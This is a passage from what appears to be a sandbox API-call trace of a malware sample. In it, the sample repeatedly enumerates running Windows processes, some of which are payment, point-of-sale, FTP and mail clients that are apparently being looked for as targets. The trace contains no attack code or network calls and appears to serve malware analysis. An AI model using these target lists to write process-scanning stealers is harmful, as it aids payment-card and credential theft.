cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0242.227] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0242.228] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0242.230] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0242.293] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0242.294] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0242.296] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0242.298] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0242.299] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0242.301] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0242.302] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0242.304] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0242.305] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.307] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.309] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.313] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.315] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0242.316] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.318] Process32Next (in: hSnapshot=0x1494, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0242.319] CloseHandle (hObject=0x1494) returned 1 [0242.320] Sleep (dwMilliseconds=0x64) [0242.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0242.477] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0242.479] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0242.480] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0242.484] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.486] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0242.487] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0242.489] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0242.490] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0242.492] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0242.493] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.495] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.499] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.501] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.502] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.505] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.507] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.509] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.511] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.563] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0242.565] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0242.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.568] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.569] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0242.571] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0242.572] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0242.574] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.575] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.580] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0242.581] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.583] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.584] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0242.586] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0242.587] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0242.589] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0242.603] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0242.604] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0242.606] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0242.608] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0242.609] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0242.611] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0242.612] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0242.614] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0242.616] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0242.617] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0242.619] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0242.620] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0242.670] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0242.671] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0242.673] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0242.674] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0242.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0242.678] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0242.679] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0242.681] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0242.683] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0242.684] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0242.689] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0242.691] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0242.693] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0242.695] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0242.697] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0242.699] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0242.704] Process32Next (in: hSnapshot=0x17b0, 